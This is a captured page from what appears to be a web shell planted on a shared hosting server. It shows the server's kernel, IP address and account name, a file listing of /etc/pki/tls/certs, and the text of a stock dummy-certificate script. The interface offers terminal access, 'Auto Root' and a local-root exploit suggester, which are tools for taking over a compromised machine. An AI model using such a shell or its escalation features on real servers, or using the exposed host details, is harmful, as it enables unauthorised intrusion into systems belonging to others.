Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.129
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
pki /
tls /
certs /
Delete
Unzip
Name
Size
Permission
Date
Action
Makefile
2.46
KB
-rw-r--r--
2026-02-10 20:25
ca-bundle.crt
226.52
KB
-r--r--r--
2026-05-04 10:24
ca-bundle.trust.crt
507.48
KB
-r--r--r--
2026-05-04 10:24
localhost.crt
1.47
KB
-rw-------
2020-06-12 08:01
make-dummy-cert
610
B
-rwxr-xr-x
2026-02-10 20:25
renew-dummy-cert
829
B
-rwxr-xr-x
2026-02-10 20:25
wp3.internet-webhosting.com.crt
1.46
KB
-rw-r--r--
2020-06-12 11:07
yavrix.internet-webhosting.com.crt
1.46
KB
-rw-r--r--
2025-04-16 03:56
Save
Rename
#!/bin/sh umask 077 answers() { echo -- echo SomeState echo SomeCity echo SomeOrganization echo SomeOrganizationalUnit echo localhost.localdomain echo root@localhost.localdomain } if [ $# -eq 0 ] ; then echo $"Usage: `basename $0` filename [...]" exit 0 fi for target in $@ ; do PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` trap "rm -f $PEM1 $PEM2" SIGINT answers | /usr/bin/openssl req -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 2> /dev/null cat $PEM1 > ${target} echo "" >> ${target} cat $PEM2 >> ${target} rm -f $PEM1 $PEM2 done